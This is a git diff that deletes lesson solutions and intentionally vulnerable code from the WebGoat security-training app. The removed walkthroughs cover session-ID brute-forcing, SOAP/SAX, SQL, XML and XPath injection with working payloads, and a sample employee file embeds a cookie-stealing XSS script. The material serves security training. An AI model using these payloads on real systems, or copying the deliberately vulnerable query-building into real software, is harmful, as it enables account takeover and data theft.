-
-
-
-
-
-
-
-
-
-
Solution:
-
-
-
-
The easiest
-way to complete this lesson is to use WebScarab's Session ID Analysis.
-
-
-
-
Go to
-WebScarab and click on the button "SessionID Analysis". Select the last POST
-request from the "Previous requests" drop-down box.
-
-
-
-
Figure 1 WebScarabs SessionID Analysis
-
-
-
-
To make sure
-that WebScarab is able to fetch the WEAKID cookie, you need to click the "Test"
-button on the bottom of the screen. A pop-up window must be shown like below.
-
-
-
-
-
-
Figure 2 SessionID WEAKID discovered
-
-
-
-
If you don’t
-have a pop-up window with the Extracted Sessionids, you must edit the Request.
-You must delete the WEAKID value from the request. Without this cookie value,
-WebGoat will return a HTTP Header "Set-Cookie: WEAKID=value" so WebScarab
-learns about this value.
-
-
-
-
-
-
Fetch 50
-samples and examine the results. Enter "50" in the "Samples" window and click
-the button "Fetch". You will not see any information about progress.
-
-
-
-
-
-
-
-
Now you need
-to go to the tab "Analysis".
-
-
-
-
-
-
-
-
In the "Analysis"
-pane you see nothing.
-
-
-
-
You must
-select the Session Identifier WEAKID value from the drop-down box.
-
-
-
-
-
-
-
-
The WEAKID is
-divided in 2 parts: the first part is an identifier that is added 1 in every
-cookie and a time value. The time value is calculated at the moment that you
-submit the request.
-
-
-
-
Notice that
-there is sometimes a gap in the first value of the WEAKID, skipping with 1. The
-value that is missing is the value that you need to know to log on. Now you
-only need to calculate the timestamp. This can be brute-forced using Crowbar.
-You know the previous timestamp and the next timestamp so you have a start and
-end value.
-You can download Crowbar for free: http://www.sensepost.com/research/crowbar/
-
-
-
-
-
-
-
-
-
There is a
-value 16935 and a value 16937 with a numeric difference of 28110 instead of
-14109, so there the WEAKID cookie is located. Copy and paste the raw HTTP
-request in Crowbar:
-
-
-
-
Figure 3 Crowbar
-
-
-
-
Change target
-to localhost and adjust the port.
-
-
Create a Base
-response. Make sure that you see "How to hijack a session" in the middle
-window.
-
-
-
-
Insert ##1##
-in the WEAKID parameter where you want to brute-force the value and be aware, that the first part of the WEAKID is the one we are searching for (16936).
-The WEAKID in Crowbar lookes like this: Cookie: JSESSIONID=...; WEAKID=16936 -1163685##1## ;
-Start the first loop at 363093, the last digits of the last cookie before the
-authentication cookie and 363203, the first cookie after the authentication
-cookie. You have to enter these two values in the Parameter1 fields. We have to brute-force these values, but we are sure that they lie
-between these two boundaries.
-
-
Examine the
-results until you see a different fuzzy logic value (the blue line in Figure 3), right-click it and click on "Show
-reply".
-
-
-
-
-
-
Figure 4 Lesson 12 Completed
-
-
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/colorschememapping.xml b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/filelist.xml b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/filelist.xml
deleted file mode 100644
index 082acf789..000000000
--- a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/filelist.xml
+++ /dev/null
@@ -1,25 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image001.png b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image001.png
deleted file mode 100644
index 560ca80c0..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image003.png b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image003.png
deleted file mode 100644
index f0100265e..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image005.png b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image005.png
deleted file mode 100644
index c42733b93..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image007.png b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image007.png
deleted file mode 100644
index a34c6751c..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image010.png b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image010.png
deleted file mode 100644
index 0c6fe9313..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image010.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image012.png b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image012.png
deleted file mode 100644
index 46b787813..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image012.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image014.png b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image014.png
deleted file mode 100644
index bde7fd0bd..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image014.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image016.png b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image016.png
deleted file mode 100644
index d25bc4167..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image016.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image018.png b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image018.png
deleted file mode 100644
index bb0344681..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image018.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image020.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image020.jpg
deleted file mode 100644
index b825cea5d..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image020.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image021.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image021.jpg
deleted file mode 100644
index a7fd9b516..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image021.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image022.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image022.jpg
deleted file mode 100644
index b38898623..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image022.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image023.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image023.jpg
deleted file mode 100644
index 0c3616032..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image023.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image024.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image024.jpg
deleted file mode 100644
index 632ca5835..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image024.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image025.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image025.jpg
deleted file mode 100644
index 0ab015bbb..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image025.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image026.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image026.jpg
deleted file mode 100644
index bc5a7fe32..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image026.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image027.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image027.jpg
deleted file mode 100644
index 7bbdb5f09..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image027.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image028.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image028.jpg
deleted file mode 100644
index 4530c95f9..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image028.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image029.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image029.jpg
deleted file mode 100644
index 112d5259b..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image029.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/themedata.thmx b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WsSAXInjection.html b/src/main/webapp/lesson_solutions_1/WsSAXInjection.html
deleted file mode 100644
index c5e854290..000000000
--- a/src/main/webapp/lesson_solutions_1/WsSAXInjection.html
+++ /dev/null
@@ -1,917 +0,0 @@
-
-
-
-
-
-
-
-Solution: Web Service SAX Injection
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson Plan Title: How to Perform Web Service SAX
-Injection
-
-
-
-
Concept / Topic To Teach:
-
-
-
-
Web Services
-communicate through the use of SOAP requests. These requests are submitted to a
-web service in an attempt to execute a function defined in the web service
-definition language (WSDL) file.
-
-
-
-
General Goal(s):
-
-
Some web
-interfaces make use of Web Services in the background. If the frontend relies
-on the web service for all input validation, it may be possible to corrupt the
-XML that the web interface sends.
-
-
-
-
In this
-exercise, try to change the password for a user other than 101.
-
-
-
-
-
-
-
-
Solution:
-
-
-
-
To succeed
-this lesson it is required to reset the password of the user with a different
-user-ID then 101 (which is your user-ID)
-
-
.
-
-
When you fill
-out a password and click on "Go!" the following XML request will be created,
-submit and parsed by the SAX parser:
-
-
-
-
<?xml version='1.0' encoding='UTF-8'?> <wsns0:Envelope xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance' xmlns:xsd='http://www.w3.org/2001/XMLSchema' xmlns:wsns0='http://schemas.xmlsoap.org/soap/envelope/' xmlns:wsns1='http://lessons.webgoat.owasp.org'> <wsns0:Body> <wsns1:changePassword> <id xsi:type='xsd:int'>101</id> <password xsi:type='xsd:string'>[password]</password> </wsns1:changePassword> </wsns0:Body></wsns0:Envelope>
-
-
-
-
SAX parsers will parse anything that
-is well-formed, meaning that there are matching end and close tags and that the
-schema is correct. When you are able to add a new changePAssword element with
-corresponding id tag and password tag, the SAX parser will be more than happy
-to change the password for the user-ID provided.
-
-
So you need to have something like
-this as a final result:
-
-
-
-
<?xml version='1.0'
-encoding='UTF-8'?>
-
-
<wsns0:Envelope
-
-
- xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
-
-
- xmlns:xsd='http://www.w3.org/2001/XMLSchema'
-
-
- xmlns:wsns0='http://schemas.xmlsoap.org/soap/envelope/'
-
-
- xmlns:wsns1='http://lessons.webgoat.owasp.org'>
-
-
- <wsns0:Body>
-
-
- <wsns1:changePassword>
-
-
- <id xsi:type='xsd:int'>101</id>
-
-
- <password xsi:type='xsd:string'>[password]</password>
-
-
- </wsns1:changePassword>
-
-
- <wsns1:changePassword>
-
-
- <id xsi:type='xsd:int'>102</id>
-
-
- <password xsi:type='xsd:string'>notforyoutoknow</password>
-
-
- </wsns1:changePassword>
-
-
- </wsns0:Body>
-
-
</wsns0:Envelope>
-
-
-
-
This requires to inject:
-
-
newpassword</password>
-
-
- </wsns1:changePassword>
-
-
- <wsns1:changePassword>
-
-
- <id xsi:type='xsd:int'>102</id>
-
-
- <password xsi:type='xsd:string'>notforyoutoknow
-
-
-
-
There are field-limitations in the
-HTML input field, so it is required to intercept the HTTP Request with
-WebScarab and replace the parameter password with the payload.
-
-
-
-
Enter a password 'test' and click
-"Go!".
-
-
-
-
Figure
-113 Reset password with test
-
-
-
-
Intercept the request in WebScarab and
-replace the string test with the payload.
-
-
-
-
-
-
Figure
-114 Intercept request
-
-
-
-
-
-
Figure
-115 Inject XML payload
-
-
-
-
-
-
Figure
-116 Lesson completed
-
-
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/WsSqlInjection.html b/src/main/webapp/lesson_solutions_1/WsSqlInjection.html
deleted file mode 100644
index c9423fcdc..000000000
--- a/src/main/webapp/lesson_solutions_1/WsSqlInjection.html
+++ /dev/null
@@ -1,767 +0,0 @@
-
-
-
-
-
-
-
-Solution: Web Service SQL Injection
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to
-Perform Web Service SQL Injection
-
-
-
-
Concept /
-Topic To Teach:
-
-
Web
-Services communicate through the use of SOAP requests. These requests are
-submitted to a web service in an attempt to execute a function defined in the
-web service definition language (WSDL) file.
-
-
-
-
General
-Goal(s):
-
-
Check the web
-service description language (WSDL) file and try to obtain multiple customer
-credit card numbers. You will not see the results returned to this screen. When
-you believe you have suceeded, refresh the page and look for the 'green star'.
-
-
Solution:
-
-
-
-
This lesson
-can be solved easily by using a web services tool called SOAPUI. But here you
-will only use WebScarab. Go in WebScarab to the tab "Web Services". You will
-see a history of invoked web services or WSDL files.
-
-
-
-
-
-
Figure 1 Lesson 23
-
-
-
-
Open the
-WebGoat WSDL file for this lesson (WsSqlInjection?WSDL) in a new window.
-
-
-
-
In WebScarab
-you can select this WSDL from the top drop-down box. And WebScarab will parse
-the XML file so you can select the operations to invoke. Then you can enter a
-value for the parameters used to invoke the operation. For example fill out the
-integer 101 for the ID value and click "Execute". WebScarab will pop-up a basic
-authentication window. Enter username:guest, password:guest and host:localhost then click "Ok".
-If the pop-up does not appear you have to go to "Tools" > "Credentials". There you should activate "Ask when required".
-
-
-
-
-
-
Figure 2 Basic authentication
-
-
-
-
-
-
Figure 3 Webservice Response
-
-
-
-
What happens
-if you change 101 to 1 OR 1=1? Will you get all the credit cards?
-
-
Yes J
-
-
-
-
-
-
Figure 4 All the credit cards
-
-
-
-
Remark: when you don't get any responses you
-might want to select the service and operation again from the drop-down box. A nice
-feature here would be the ability to make a raw SOAP request.
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/XMLInjection.html b/src/main/webapp/lesson_solutions_1/XMLInjection.html
deleted file mode 100644
index 6bfd82437..000000000
--- a/src/main/webapp/lesson_solutions_1/XMLInjection.html
+++ /dev/null
@@ -1,862 +0,0 @@
-
-
-
-
-
-
-
-Solution: XML Injection
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to
-Perform XML Injection Attacks.
-
-
-
-
Concept /
-Topic To Teach:
-
-
This lesson
-teaches how to perform XML Injection attacks.
-
-
-
-
How the
-attacks works:
-
-
AJAX applications
-use XML to exchange information with the server. This XML can be easily
-intercepted and altered by a malicious attacker.
-
-
-
-
General
-Goal(s):
-
-
WebGoat-Miles
-Reward Miles shows all the rewards available. Once you've entered your account
-ID, the lesson will show you your balance and the products you can afford. Your
-goal is to try to add more rewards to your allowed set of rewards. Your account
-ID is 836239.
-
-
-
-
-
-
Figure 1 AJAX Security - XML Injection
-
-
-
-
Solution:
-
-
-
-
To understand
-the behavior of the AJAX application, enter your account number 836239 and
-intercept the HTTP Request and HTTP Response using WebScarab.
-
-
-
-
-
-
Figure 2 Enter account number
-
-
-
-
-
-
Figure 3 Intercepted HTTP Request
-
-
-
-
-
-
Figure 4 Intercepted HTTP Response
-
-
-
-
From the HTTP Response you can see that you get back an XML
-message with the rewards for your account:
-
-
-
-
<root>
-
-
<reward>WebGoat t-shirt 20 Pts</reward>
-
-
<reward>WebGoat Secure Kettle 50 Pts</reward>
-
-
<reward>WebGoat Mug 30 Pts</reward>
-
-
</root>
-
-
-
-
What happens if you intercept this HTTP Response and update
-the XML message to become:
-
-
-
-
<root>
-
-
<reward>WebGoat t-shirt 20 Pts</reward>
-
-
<reward>WebGoat Secure Kettle 50 Pts</reward>
-
-
<reward>WebGoat Mug 30 Pts</reward>
-
-
<reward>WebGoat Core Duo Laptop 2000
-Pts</reward>
-
-
<reward>WebGoat Hawaii Cruise 3000 Pts</reward>
-
-
</root>
-
-
-
-
-
-
Figure 5 Changed XML response
-
-
-
-
You need to
-do this three times!
-
-
-
-
-
-
Figure 6 Injected XML results
-
-
-
-
-
-
Figure 7 Select your reward
-
-
-
-
Select the
-Laptop and the Cruise and click "Submit".
-
-
-
-
-
-
Figure 8 Lesson completed
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/XPATHInjection.html b/src/main/webapp/lesson_solutions_1/XPATHInjection.html
deleted file mode 100644
index 09208cf6d..000000000
--- a/src/main/webapp/lesson_solutions_1/XPATHInjection.html
+++ /dev/null
@@ -1,788 +0,0 @@
-
-
-
-
-
-
-
-Solution: XPATH Injection
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to
-Perform XPATH Injection Attacks.
-
-
-
-
Concept /
-Topic To Teach:
-
-
This lesson
-teaches how to perform XPath Injection attacks.
-
-
-
-
How the
-attacks works:
-
-
Similar to SQL
-Injection, XPATH Injection attacks occur when a web site uses user supplied
-information to query XML data. By sending intentionally malformed information
-into the web site, an attacker can find out how the XML data is structured or
-access data that they may not normally have access to. They may even be able to
-elevate their privileges on the web site if the xml data is being used for
-authentication (such as an xml based user file). Querying XML is done with
-XPath, a type of simple descriptive statement that allows the xml query to
-locate a piece of information. Like SQL you can specify certain attributes to
-find and patterns to match. When using XML for a web site it is common to
-accept some form of input on the query string to identify the content to locate
-and display on the page. This input must be sanitized to verify that it doesn't
-mess up the XPath query and return the wrong data.
-
-
-
-
General
-Goal(s):
-
-
The
-form below allows employees to see all their personal data including their
-salaries. Your account is Mike/test123. Your goal is to try to see other
-employees data as well.
-
-
-
-
-
-
Figure 1 XPath Injection
-
-
-
-
XPath injection is similar to SQL Injection. Input is not validated and
-used to create a XPath query. Here you can see how the XPATH query is built:
-
-String dir = s.getContext().getRealPath("/lessons/XPATHInjection/EmployeesData.xml");
-File d = new File(dir);
-XPathFactory factory = XPathFactory.newInstance();
-XPath xPath = factory.newXPath();
-InputSource inputSource = new InputSource(new FileInputStream(d));
-String expression = "/employees/employee[loginID/text()='" + username + "' and passwd/text()='" + password + "']";
-nodes = (NodeList) xPath.evaluate(expression, inputSource, XPathConstants.NODESET);
-
-
-
-
-
-
-
-
Figure 2 Inject XPath payload
-
-
-Injecting Smith' or 1=1 or 'a'='a will log you on
-as the first user defined in the system. Password is a required field, so there
-you can enter whatever you want.
-This is what the server gets:
-expression = "/employees/employee[loginID/text()='Smith' or 1=1 or 'a'='a ' and passwd/text()='password ']"
-And this is how the server interprets it:
-expression = "/employees/employee[ ( loginID/text()='Smith' or 1=1 ) OR ( 'a'='a ' and passwd/text()='password ' ) ]"
-
-
-
-
-
Figure 3 Lesson completed
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/formate.css b/src/main/webapp/lesson_solutions_1/formate.css
deleted file mode 100644
index be54b8cca..000000000
--- a/src/main/webapp/lesson_solutions_1/formate.css
+++ /dev/null
@@ -1,2 +0,0 @@
-* { font-family:"Arial","sans-serif"; }
-code { font-family:"Courier New"; font-size:10pt; }
\ No newline at end of file
diff --git a/src/main/webapp/lessons/Ajax/clientSideFiltering.jsp b/src/main/webapp/lessons/Ajax/clientSideFiltering.jsp
deleted file mode 100644
index 178b75d3c..000000000
--- a/src/main/webapp/lessons/Ajax/clientSideFiltering.jsp
+++ /dev/null
@@ -1,114 +0,0 @@
-
-<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
- pageEncoding="ISO-8859-1"%>
-
-<%@ page import="java.io.*, javax.xml.xpath.*, org.xml.sax.InputSource,org.w3c.dom.*,org.apache.ecs.html.* " %>
-
-<%
-
- String userId = request.getParameter("userId");
-
-
- NodeList nodes = null;
-
-
-
- File d = new File(this.getServletContext().getRealPath("lessons/Ajax/employees.xml"));
-
- if(d.exists()){
- System.out.print("File does exist");
- }
- else{
- System.out.print("File DOES NOT exist");
- }
-
- System.out.println(d.getAbsolutePath());
- XPathFactory factory = XPathFactory.newInstance();
- XPath xPath = factory.newXPath();
- InputSource inputSource = new InputSource(new FileInputStream(d));
-
-
-
-
-
-
- StringBuffer sb = new StringBuffer();
-
- sb.append("/Employees/Employee/UserID | ");
- sb.append("/Employees/Employee/FirstName | ");
- sb.append("/Employees/Employee/LastName | ");
- sb.append("/Employees/Employee/SSN | ");
- sb.append("/Employees/Employee/Salary ");
-
- String expression = sb.toString();
-
-
- System.out.print("expression:" + expression);
-
-
-
- nodes = (NodeList) xPath.evaluate(expression, inputSource,
- XPathConstants.NODESET);
- int nodesLength = nodes.getLength();
-
-
- System.out.println("nodesLength:" + nodesLength);
-
- TR tr;
-
- int COLUMNS = 5;
-
- Table t2 = null;
- if (nodesLength > 0)
- {
- t2 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(
- 1).setWidth("90%").setAlign("center");
- tr = new TR();
- tr.addElement(new TD().addElement("UserID"));
- tr.addElement(new TD().addElement("First Name"));
- tr.addElement(new TD().addElement("Last Name"));
- tr.addElement(new TD().addElement("SSN"));
- tr.addElement(new TD().addElement("Salary"));
- t2.addElement(tr);
- }
-
-
-
- tr = new TR();
-
- for (int i = 0; i < nodesLength; i++)
- {
- Node node = nodes.item(i);
-
- if(i%COLUMNS==0){
- tr = new TR();
- tr.setID(node.getTextContent());
- //tr.setStyle("display: none");
- }
-
- tr.addElement(new TD().addElement(node.getTextContent()));
-
- if(i%COLUMNS==(COLUMNS-1)){
- t2.addElement(tr);
- }
- }
-
- if(t2 != null){
- out.println(t2.toString());
- }
- else{
- out.println("No Results");
- }
-
-
-
-
-
-
-
-
-
-
-
-%>
-
diff --git a/src/main/webapp/lessons/Ajax/clientSideFiltering_backup.jsp b/src/main/webapp/lessons/Ajax/clientSideFiltering_backup.jsp
deleted file mode 100644
index f8181cb0b..000000000
--- a/src/main/webapp/lessons/Ajax/clientSideFiltering_backup.jsp
+++ /dev/null
@@ -1,114 +0,0 @@
-
-<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
- pageEncoding="ISO-8859-1"%>
-
-<%@ page import="java.io.*, javax.xml.xpath.*, org.xml.sax.InputSource,org.w3c.dom.*,org.apache.ecs.html.* " %>
-
-<%
-
- String userId = request.getParameter("userID");
-
-
- NodeList nodes = null;
-
-
-
- File d = new File(this.getServletContext().getRealPath("lessons/Ajax/employees.xml"));
-
- if(d.exists()){
- System.out.print("File does exist");
- }
- else{
- System.out.print("File DOES NOT exist");
- }
-
- System.out.println(d.getAbsolutePath());
- XPathFactory factory = XPathFactory.newInstance();
- XPath xPath = factory.newXPath();
- InputSource inputSource = new InputSource(new FileInputStream(d));
-
-
-
-
-
-
- StringBuffer sb = new StringBuffer();
-
- sb.append("/Employees/Employee/UserID | ");
- sb.append("/Employees/Employee/FirstName | ");
- sb.append("/Employees/Employee/LastName | ");
- sb.append("/Employees/Employee/SSN | ");
- sb.append("/Employees/Employee/Salary ");
-
- String expression = sb.toString();
-
-
- System.out.print("expression:" + expression);
-
-
-
- nodes = (NodeList) xPath.evaluate(expression, inputSource,
- XPathConstants.NODESET);
- int nodesLength = nodes.getLength();
-
-
- System.out.println("nodesLength:" + nodesLength);
-
- TR tr;
-
- int COLUMNS = 5;
-
- Table t2 = null;
- if (nodesLength > 0)
- {
- t2 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(
- 1).setWidth("90%").setAlign("center");
- tr = new TR();
- tr.addElement(new TD().addElement("UserID"));
- tr.addElement(new TD().addElement("First Name"));
- tr.addElement(new TD().addElement("Last Name"));
- tr.addElement(new TD().addElement("SSN"));
- tr.addElement(new TD().addElement("Salary"));
- t2.addElement(tr);
- }
-
-
-
- tr = new TR();
-
- for (int i = 0; i < nodesLength; i++)
- {
- Node node = nodes.item(i);
-
- if(i%COLUMNS==0){
- tr = new TR();
- tr.setID(node.getTextContent());
- //tr.setStyle("display: none");
- }
-
- tr.addElement(new TD().addElement(node.getTextContent()));
-
- if(i%COLUMNS==(COLUMNS-1)){
- t2.addElement(tr);
- }
- }
-
- if(t2 != null){
- out.println(t2.toString());
- }
- else{
- out.println("No Results");
- }
-
-
-
-
-
-
-
-
-
-
-
-%>
-
diff --git a/src/main/webapp/lessons/Ajax/clientSideValidation.jsp b/src/main/webapp/lessons/Ajax/clientSideValidation.jsp
deleted file mode 100644
index a035833c3..000000000
--- a/src/main/webapp/lessons/Ajax/clientSideValidation.jsp
+++ /dev/null
@@ -1,30 +0,0 @@
-<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
- pageEncoding="ISO-8859-1"%>
-
-
-
-<% String coupon = request.getParameter("coupon");
-
-if (coupon.equalsIgnoreCase("PLATINUM")){
- out.print(".25");
-}
-else if (coupon.equalsIgnoreCase("GOLD")){
- out.print(".5");
-}
-else if (coupon.equalsIgnoreCase("SILVER")){
- out.print(".75");
-}
-else if (coupon.equalsIgnoreCase("BRONZE")){
- out.print(".8");
-}
-else if (coupon.equalsIgnoreCase("PRESSONE")){
- out.print(".9");
-}
-else if (coupon.equalsIgnoreCase("PRESSTWO")){
- out.print(".95");
-}
-
-
-
-%>
-
diff --git a/src/main/webapp/lessons/Ajax/employees.xml b/src/main/webapp/lessons/Ajax/employees.xml
deleted file mode 100644
index 8e0df8fcc..000000000
--- a/src/main/webapp/lessons/Ajax/employees.xml
+++ /dev/null
@@ -1,254 +0,0 @@
-
-
-
- 101
- Larry
- Stooge
- 9175 Guilford Rd
- New York, NY
- 443-689-0192
- 1012000
- 386-09-5451
- 55000
- 2578546969853547
- 5000
- Does not work well with others
- Constantly harassing coworkers
- 10106
-
- 102
- 111
- 112
-
-
-
- 102
- Moe
- Stooge
- 3013 AMD Ave
- New York, NY
- 443-938-5301
- 3082003
- 936-18-4524
- 140000
- NA
- 0
- Very dominating over Larry and Curly
- Hit Curly over head
- 101013
-
- 112
-
-
-
- 103
- Curly
- Stooge
- 1112 Crusoe Lane
- New York, NY
- 410-667-6654
- 2122001
- 961-08-0047
- 50000
- NA
- 0
- Owes three-thousand to company for fradulent purchases
- Hit Moe back
- 101014
-
- 102
- 111
- 112
-
-
-
- 104
- Eric
- Walker
- 1160 Prescott Rd
- New York, NY
- 410-887-1193
- 12152005
- 445-66-5565
- 13000
- NA
- 0
- Late. Always needs help. Too intern-ish.
- Bothering Larry about webgoat problems
- 101013
-
- 107
- 102
- 111
- 112
-
-
-
- 105
- Tom
- Cat
- 2211 HyperThread Rd.
- New York, NY
- 443-599-0762
- 1011999
- 792-14-6364
- 80000
- 5481360857968521
- 30000
- Co-Owner.
- NA
- 0
-
- 106
- 102
- 111
- 112
-
-
-
- 106
- Jerry
- Mouse
- 3011 Unix Drive
- New York, NY
- 443-699-3366
- 1011999
- 858-55-4452
- 70000
- 6981754825013564
- 20000
- Co-Owner.
- NA
- 0
-
- 102
- 111
- 112
-
-
-
- 107
- David
- Giambi
- 5132 DIMM Avenue
- New York, NY
- 610-521-8413
- 5011999
- 439-20-9405
- 100000
- 6981754825018101
- 10000
- Strong work habbit. Questionable ethics.
- Hacked into accounting server. Modified personal pay.
- 61402
-
- 102
- 111
- 112
-
-
-
- 108
- Bruce
- McGuirre
- 8899 FreeBSD Drive<script>alert(document.cookie)</script>
- New York, NY
- 610-282-1103
- 3012000
- 707-95-9482
- 110000
- 6981754825854136
- 30000
- Enjoys watching others struggle in exercises.
- Tortuous Boot Camp workout at 5am. Employees felt sick.
- 61502
-
- 107
- 102
- 111
- 112
-
-
-
- 109
- Sean
- Livingston
- 6422 dFlyBSD Road
- New York, NY
- 610-878-9549
- 6012003
- 136-55-1046
- 130000
- 6981754825014510
- 5000
- Has some fascination with Steelers. Go Ravens.
- Late to work 30 days in row due to excessive Halo 2
- 72804
-
- 107
- 102
- 111
- 112
-
-
-
- 110
- Joanne
- McDougal
- 5567 Broadband Lane
- New York, NY
- 610-213-6341
- 1012001
- 789-54-2413
- 90000
- 6981754825081054
- 300
- Finds it necessary to leave early every day.
- Used company cc to purchase new car. Limit adjusted.
- 112005
-
- 106
- 102
- 111
- 112
-
-
-
- 111
- John
- Wayne
- 129 Third St
- New York, NY
- 610-213-1134
- 1012001
- 129-69-4572
- 200000
- 4437334565679921
- 300
-
-
- 112005
-
- 112
-
-
-
- 112
- Neville
- Bartholomew
- 1 Corporate Headquarters
- San Jose, CA
- 408-587-0024
- 3012000
- 111-111-1111
- 450000
- 4803389267684109
- 300
-
-
- 112005
-
- 112
-
-
-
